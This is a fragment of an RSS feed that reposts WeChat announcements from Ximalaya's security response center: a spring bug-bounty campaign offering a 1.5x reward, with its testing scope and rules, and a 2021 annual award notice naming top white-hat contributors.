border-box;">9:00-21:00</strong></span></p></section></section></section></section><section style="text-align: right;justify-content: flex-end;display: flex;flex-flow: row nowrap;margin-top: 5px;margin-bottom: -10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 10px;height: 10px;vertical-align: top;overflow: hidden;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 12px;height: 12px;vertical-align: top;overflow: hidden;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 15px;height: 15px;vertical-align: top;overflow: hidden;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section></section><p style="white-space: normal;box-sizing: border-box;" powered-by="xiumi.us"><br style="box-sizing: border-box;"/></p><section style="text-align: center;justify-content: center;display: flex;flex-flow: row nowrap;margin-top: 15px;margin-bottom: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: auto;vertical-align: top;align-self: flex-start;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;background-color: rgba(218, 226, 174, 0.15);border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);box-shadow: rgb(191, 209, 183) 3px 3px 0px 0px;box-sizing: border-box;"><section style="margin: 10px 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="font-size: 18px;color: rgb(255, 255, 254);text-shadow: rgb(77, 105, 64) 1px 1px 0px, rgb(77, 105, 64) 1px -1px 0px, rgb(77, 105, 64) -1px 1px 0px, rgb(77, 105, 64) -1px -1px 0px, rgb(77, 105, 64) 0px 1.4px 0px, rgb(77, 105, 64) 0px -1.4px 0px, rgb(77, 105, 64) -1.4px 0px 0px, rgb(77, 105, 64) 1.4px 0px 0px;letter-spacing: 4px;line-height: 1;padding-right: 15px;padding-left: 15px;box-sizing: border-box;"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">活动规则</strong></p></section></section></section></section><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: flex;width: 100%;flex-flow: column nowrap;box-sizing: border-box;"><section style="z-index: 2;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: left;margin-bottom: -30px;line-height: 0;transform: translate3d(10px, 0px, 0px);box-sizing: border-box;"><section style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 40px;height: auto;box-sizing: border-box;"><img data-ratio="1.1194029850746268" style="vertical-align: middle;width: 100%;height: 100%;box-sizing: border-box;" data-type="svg" data-w="134" src="https://wechat2rss.xlab.app/img-proxy/?k=c3ca056b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_svg%2FOibRNdtlJdkFC1u6l0v4pDJQs7UPlib4xA8Jpt3tGQl1hNbetSE0vlfPCnZ9JP1upkTQLEqaSvb7p4TibI46n8atQqiaZJhUY6eY%2F640%3Fwx_fmt%3Dsvg"/></section></section></section></section></section><section style="text-align: center;justify-content: center;display: flex;flex-flow: row nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 90%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 5px;overflow: hidden;background-color: rgba(218, 226, 174, 0.15);padding: 5px;height: auto;box-sizing: border-box;"><section style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 5px;overflow: hidden;background-color: rgb(255, 255, 255);padding: 10px;box-sizing: border-box;"><section style="margin-top: 10px;margin-bottom: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: justify;font-size: 15px;color: rgba(62, 62, 62, 0.82);letter-spacing: 1px;line-height: 2;box-sizing: border-box;"><p style="text-align: center;white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">活动期间提交有效漏洞者</span></p><p style="text-align: center;white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">均可获得<strong style="box-sizing: border-box;">1.5倍安全币</strong>奖励</span></p><p style="text-align: center;white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">（贡献值不翻倍）</span></p><p style="text-align: center;white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;"><br/></span></p><p style="text-align: center;white-space: normal;box-sizing: border-box;"><span style="font-size: 12px;box-sizing: border-box;"> *要能证明实际危害，小程序和隐私合规问题不在本次活动收集范围内～</span></p></section></section><section style="justify-content: flex-start;display: flex;flex-flow: row nowrap;margin-top: 15px;margin-bottom: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: auto;vertical-align: middle;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;border-bottom: 6px solid rgb(191, 209, 183);border-bottom-right-radius: 0px;line-height: 1;letter-spacing: 0px;align-self: center;box-sizing: border-box;"><section style="margin-right: 0%;margin-bottom: -5px;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="font-size: 15px;color: rgb(77, 105, 64);line-height: 1;letter-spacing: 2px;padding-right: 5px;padding-left: 5px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;box-sizing: border-box;"><strong style="box-sizing: border-box;">测试范围</strong></p></section></section></section></section><section style="margin-bottom: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: justify;font-size: 15px;color: rgba(62, 62, 62, 0.82);letter-spacing: 1px;line-height: 2;box-sizing: border-box;"><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">    <strong style="box-sizing: border-box;">web（包括但不限于）：</strong></span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">                    *.ximalaya.com<br style="box-sizing: border-box;"/></span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">                    *.qingxuetang.com<br style="box-sizing: border-box;"/></span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">                    *.himalaya.com</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">                    *.qijizuopin.com</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">                    *.ximalayaos.com</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">                    *.xima.tv</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">                    *.xiaoyastar.com</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">        <br style="box-sizing: border-box;"/></span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">   <strong style="box-sizing: border-box;">  app（仅限以下）：</strong></span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">                    喜马拉雅</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">                    喜马拉雅极速版</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">                    喜马拉雅儿童</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">                    轻学堂</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">                    奇迹文学</span></p></section></section><section style="justify-content: flex-start;display: flex;flex-flow: row nowrap;margin-top: 15px;margin-bottom: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: auto;vertical-align: middle;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;border-bottom: 6px solid rgb(191, 209, 183);border-bottom-right-radius: 0px;line-height: 1;letter-spacing: 0px;align-self: center;box-sizing: border-box;"><section style="margin-right: 0%;margin-bottom: -5px;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="font-size: 15px;color: rgb(77, 105, 64);line-height: 1;letter-spacing: 2px;padding-right: 5px;padding-left: 5px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;box-sizing: border-box;"><strong style="box-sizing: border-box;">提交漏洞</strong></p></section></section></section></section><section style="margin-bottom: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: center;font-size: 15px;color: rgba(62, 62, 62, 0.82);letter-spacing: 1px;line-height: 2;box-sizing: border-box;"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;"><a href="https://security.ximalaya.com/" target="_blank">https://security.ximalaya.com/</a></span></strong></p></section></section></section></section><section style="text-align: right;justify-content: flex-end;display: flex;flex-flow: row nowrap;margin-top: 5px;margin-bottom: -10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 10px;height: 10px;vertical-align: top;overflow: hidden;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 12px;height: 12px;vertical-align: top;overflow: hidden;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 15px;height: 15px;vertical-align: top;overflow: hidden;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section></section><p style="white-space: normal;box-sizing: border-box;" powered-by="xiumi.us"><br style="box-sizing: border-box;"/></p><section style="text-align: center;justify-content: center;display: flex;flex-flow: row nowrap;margin-top: 15px;margin-bottom: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: auto;vertical-align: top;align-self: flex-start;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;background-color: rgba(218, 226, 174, 0.15);border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);box-shadow: rgb(191, 209, 183) 3px 3px 0px 0px;box-sizing: border-box;"><section style="margin: 10px 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="font-size: 18px;color: rgb(255, 255, 254);text-shadow: rgb(77, 105, 64) 1px 1px 0px, rgb(77, 105, 64) 1px -1px 0px, rgb(77, 105, 64) -1px 1px 0px, rgb(77, 105, 64) -1px -1px 0px, rgb(77, 105, 64) 0px 1.4px 0px, rgb(77, 105, 64) 0px -1.4px 0px, rgb(77, 105, 64) -1.4px 0px 0px, rgb(77, 105, 64) 1.4px 0px 0px;letter-spacing: 4px;line-height: 1;padding-right: 15px;padding-left: 15px;box-sizing: border-box;"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">更多</strong></p></section></section></section></section><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: flex;width: 100%;flex-flow: column nowrap;box-sizing: border-box;"><section style="z-index: 2;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: left;margin-bottom: -30px;line-height: 0;transform: translate3d(10px, 0px, 0px);box-sizing: border-box;"><section style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 40px;height: auto;box-sizing: border-box;"><img class="rich_pages wxw-img" data-ratio="1.1194029850746268" style="vertical-align: middle;width: 100%;height: 100%;box-sizing: border-box;" data-type="svg" data-w="134" src="https://wechat2rss.xlab.app/img-proxy/?k=c3ca056b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_svg%2FOibRNdtlJdkFC1u6l0v4pDJQs7UPlib4xA8Jpt3tGQl1hNbetSE0vlfPCnZ9JP1upkTQLEqaSvb7p4TibI46n8atQqiaZJhUY6eY%2F640%3Fwx_fmt%3Dsvg"/></section></section></section></section></section><section style="text-align: center;justify-content: center;display: flex;flex-flow: row nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 90%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 5px;overflow: hidden;background-color: rgba(218, 226, 174, 0.15);padding: 5px;height: auto;box-sizing: border-box;"><section style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 5px;overflow: hidden;background-color: rgb(255, 255, 255);padding: 10px;box-sizing: border-box;"><section style="margin-top: 10px;margin-bottom: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: justify;font-size: 15px;color: rgba(62, 62, 62, 0.82);letter-spacing: 1px;line-height: 2;box-sizing: border-box;"><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">   禁止对网站后台和项目使用大规模扫描器。</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">   禁止进行可能引起业务异常运行的测试，例如：IIS的拒绝服务等可导致拒绝服务的漏洞测试以及DDOS攻击。<br style="box-sizing: border-box;"/>    对于一切违反测试规范的行为，XMSRC保留追究其法律责任的权利。</span></p><p style="text-indent: 2em;white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;"><br/></span></p></section></section><section style="justify-content: flex-start;display: flex;flex-flow: row nowrap;margin-top: 15px;margin-bottom: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: auto;vertical-align: middle;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;border-bottom: 6px solid rgb(191, 209, 183);border-bottom-right-radius: 0px;line-height: 1;letter-spacing: 0px;align-self: center;box-sizing: border-box;"><section style="margin-right: 0%;margin-bottom: -5px;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="font-size: 15px;color: rgb(77, 105, 64);line-height: 1;letter-spacing: 2px;padding-right: 5px;padding-left: 5px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;box-sizing: border-box;"><strong style="box-sizing: border-box;">附录</strong></p></section></section></section></section><section style="margin-top: 10px;margin-bottom: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: justify;font-size: 15px;color: rgba(62, 62, 62, 0.82);letter-spacing: 1px;line-height: 2;box-sizing: border-box;"><p style="text-align: left;white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;"> 1、【春日活动】限时1个月，赢1.5倍奖励！</span><span style="box-sizing: border-box;font-size: 12px;"><a href="https://security.ximalaya.com/announcement/msg/118" target="_blank">https://security.ximalaya.com/announcement/msg/118</a></span></p><p style="text-align: left;white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;"> 2、喜马拉雅SRC漏洞处理规则及评分标准v2.1</span></p><p style="text-align: left;white-space: normal;box-sizing: border-box;"><span style="box-sizing: border-box;font-size: 12px;"><a href="https://security.ximalaya.com/announcement/msg/54" target="_blank">https://security.ximalaya.com/announcement/msg/54</a></span></p><p style="text-align: left;white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;"> 3、SRC行业安全测试规范</span><span style="box-sizing: border-box;font-size: 12px;"><a href="https://security.ximalaya.com/announcement/msg/46" target="_blank">https://security.ximalaya.com/announcement/msg/46</a></span></p></section></section></section></section><section style="text-align: right;justify-content: flex-end;display: flex;flex-flow: row nowrap;margin-top: 5px;margin-bottom: -10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 10px;height: 10px;vertical-align: top;overflow: hidden;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 12px;height: 12px;vertical-align: top;overflow: hidden;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 15px;height: 15px;vertical-align: top;overflow: hidden;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section></section><p style="white-space: normal;box-sizing: border-box;" powered-by="xiumi.us"><br style="box-sizing: border-box;"/></p><p style="white-space: normal;box-sizing: border-box;" powered-by="xiumi.us"><br style="box-sizing: border-box;"/></p><section style="margin-right: 0%;margin-left: 0%;text-align: center;justify-content: center;display: flex;flex-flow: row nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 90%;vertical-align: top;border-width: 0px;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><section style="display: flex;flex-flow: row nowrap;justify-content: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;vertical-align: bottom;width: auto;border-width: 1px 0px 4px 1px;border-style: solid solid none;border-color: rgb(77, 105, 64) rgb(255, 108, 68) rgb(255, 108, 68) rgb(77, 105, 64);flex: 100 100 0%;align-self: flex-end;height: auto;z-index: 2;box-sizing: border-box;"><section style="text-align: justify;box-sizing: border-box;" powered-by="xiumi.us"><p style="white-space: normal;box-sizing: border-box;"><br style="box-sizing: border-box;"/></p></section></section><section style="display: inline-block;vertical-align: bottom;width: 140px;align-self: flex-end;flex: 0 0 auto;border-width: 0px;z-index: 1;margin-left: 5px;height: auto;box-sizing: border-box;"><section style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row nowrap;margin-bottom: 15px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;background-color: rgb(77, 105, 64);border-radius: 20px;overflow: hidden;box-sizing: border-box;"><section style="text-align: center;color: rgb(255, 255, 255);box-sizing: border-box;" powered-by="xiumi.us"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">关注我们</strong></p></section></section></section></section></section><section style="justify-content: center;display: flex;flex-flow: row nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;padding: 10px;border-bottom: 1px solid rgb(77, 105, 64);border-right: 1px solid rgb(77, 105, 64);border-left: 1px solid rgb(77, 105, 64);align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><section><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-weui-theme="light" data-id="MzI3Mzk4MDQ5NQ==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/bNibSwNU98ib9JD0f8Iq5cXAbKpViaicStFMXZXbHAricLXbhWGNrPF0h4VwMGk4x8zzd9GNCIicqCvCiakK6468pKibbg/0?wx_fmt=png" data-nickname="喜马拉雅安全响应平台" data-alias="XimalayaSecurity" data-signature="喜马拉雅安全响应中心" data-from="1" data-is_biz_ban="0"></mp-common-profile></section><section style="margin-top: -20px;box-sizing: border-box;" powered-by="xiumi.us"><section style="letter-spacing: 1px;line-height: 1.8;font-size: 14px;text-align: justify;color: rgba(62, 62, 62, 0.82);box-sizing: border-box;"><p style="white-space: normal;box-sizing: border-box;"><br style="box-sizing: border-box;"/></p></section></section><section style="text-align: justify;font-size: 14px;color: rgba(62, 62, 62, 0.82);line-height: 2;letter-spacing: 1px;box-sizing: border-box;" powered-by="xiumi.us"><p style="text-align: center;white-space: normal;box-sizing: border-box;">感谢您的关注～</p><p style="text-align: center;white-space: normal;box-sizing: border-box;">官方邮箱｜security@ximalaya.com</p><p style="white-space: normal;box-sizing: border-box;"><br style="box-sizing: border-box;"/></p></section></section></section></section></section><p style="white-space: normal;box-sizing: border-box;" powered-by="xiumi.us"><br style="box-sizing: border-box;"/></p></section><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483790">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7a34631d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247483790%26idx%3D1%26sn%3D38cdfe0582f6de07146be0a6239c08fb%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 04 Apr 2023 15:53:00 +0800</pubDate>
    </item>
    <item>
      <title>喜马拉雅SRC 2021年度奖励公告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247483758&amp;idx=1&amp;sn=2b5a4285c530158eef2638c0391b3154</link>
      <description>@所有人  您有一份喜马SRC个人年终奖励待领取</description>
      <content:encoded><![CDATA[<p>
<span>XMSRC</span> <span>2022-01-24 15:00</span> <span style="display: inline-block;"></span>
</p>

<p>@所有人  您有一份喜马SRC个人年终奖励待领取</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=5375fc4f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ibicc2C7QDZyggc7YjQ7hxLZUQuyiaA1ha5C8Lia96dHiaC4w8L6QRSh8ic48vic5SKos23IVqOXkWM7Bp3w%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><span style="font-family: DengXian;color: rgb(0, 0, 0);">过去的一年</span></p><p style="white-space: normal;font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);text-align: center;"><span style="font-size: 17px;font-family: DengXian;">XMSRC收到了</span><span style="font-family: DengXian;font-size: 17px;">广大白帽子的漏洞轰炸&amp;花式催审</span></p><p data-darkmode-bgcolor-16429904795036="rgb(188, 190, 194)" data-darkmode-original-bgcolor-16429904795036="#fff|rgb(255, 255, 255)|rgb(247, 250, 255)" data-darkmode-color-16429904795036="rgb(62, 62, 62)" data-darkmode-original-color-16429904795036="#fff|rgb(62, 62, 62)" style="white-space: normal;font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);text-align: center;"><span style="font-size: 17px;font-family: DengXian;">感谢各位白帽子的支持与厚爱！</span></p><p style="white-space: normal;font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);text-align: center;"><span style="font-size: 17px;font-family: DengXian;"></span></p><p style="white-space: normal;font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);text-align: center;"><span style="font-size: 17px;font-family: DengXian;">经过一年的激烈角逐，我们的年度榜单出来啦，</span></p><p style="white-space: normal;font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);text-align: center;"><span style="font-size: 17px;font-family: DengXian;">当然还有大家关心的年度奖励结果啦！</span></p><p style="white-space: normal;font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);text-align: center;"><span style="font-size: 17px;font-family: DengXian;">快来看看榜单吧～</span><span style="font-family: DengXian;font-size: 17px;"></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-backh="104" data-backw="578" data-galleryid="" data-ratio="0.18028846153846154" data-s="300,640" style="color: rgb(0, 0, 0);font-family: 宋体;font-size: 16px;text-align: center;white-space: normal;width: 100%;height: auto;" data-type="png" data-w="832" src="https://wechat2rss.xlab.app/img-proxy/?k=ec2d08a0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicc2C7QDZyggc7YjQ7hxLZU4L3tjTazicaprPibZcibujP1SNf8nhZ3XG40qd8v6BIQEoY6IR9D6XbMw%2F640%3Fwx_fmt%3Dpng"/></p><section style="text-align: left;margin-bottom: 20px;"><strong>向喜马SRC英雄致敬</strong></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-backh="472" data-backw="578" data-galleryid="" data-ratio="0.8167259786476868" data-s="300,640" style="width: 100%;height: auto;" data-type="png" data-w="1124" src="https://wechat2rss.xlab.app/img-proxy/?k=a6b0fc59&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicc2C7QDZyggc7YjQ7hxLZUGTtowRxvu2SAweqpHibZmD4GFR2qibNFruanXP6V8Xc4EtAwYmLYibSxA%2F640%3Fwx_fmt%3Dpng"/></p><section style="text-align: center;margin-bottom: 20px;"><span style="font-size: 12px;">篇幅所限，截图仅展示21年部分为喜马安全作出贡献的白帽子名单<br/></span></section><p data-darkmode-bgcolor-16429904795036="rgb(188, 190, 194)" data-darkmode-original-bgcolor-16429904795036="#fff|rgb(255, 255, 255)|rgb(247, 250, 255)" data-darkmode-color-16429904795036="rgb(62, 62, 62)" data-darkmode-original-color-16429904795036="#fff|rgb(62, 62, 62)" style="white-space: normal;font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);text-align: center;"><span style="font-size: 17px;font-family: DengXian;">感谢大家在2021年，</span></p><p style="white-space: normal;font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);text-align: center;margin-bottom: 10px;"><span style="font-size: 17px;font-family: DengXian;">为喜马拉雅安全做出的每一份付出与努力！</span></p><p style="white-space: normal;font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);text-align: center;"><span style="font-size: 17px;font-family: DengXian;">喜马因为有你们才更安全！</span></p><p style="white-space: normal;font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);text-align: center;"><span style="font-size: 17px;font-family: DengXian;">世界因为有你们才更温暖！</span></p><p style="white-space: normal;font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);text-align: center;"><span style="font-size: 17px;font-family: DengXian;"><br/></span></p><section style="white-space: normal;font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);text-align: left;margin-bottom: 20px;"><strong><span style="font-size: 17px;font-family: DengXian;">根据喜马年终奖励计划</span></strong></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.28651059085841696" data-s="300,640" style="" data-type="png" data-w="897" src="https://wechat2rss.xlab.app/img-proxy/?k=dae4e7e8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicc2C7QDZyggc7YjQ7hxLZUicldY1VAMVPVzzaJCLQwSxufsibh4icNibIfrM0jnJt6IVgfByxGhQSqzA%2F640%3Fwx_fmt%3Dpng"/></p><section style="font-size: 14px;font-family: DengXian;text-align: left;color: rgb(0, 0, 0);white-space: normal;margin-top: 20px;"><strong><span style="font-size: 17px;">恭喜获得喜马年终活动个人奖励的白帽子：</span><strong style="font-size: 17px;text-align: center;"><span style="color: rgb(202, 96, 96);">DeepMemory、xq17的小弟</span></strong></strong></section><p style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;">            </p><section style="text-align: center;margin-bottom: 20px;"><img class="rich_pages wxw-img" 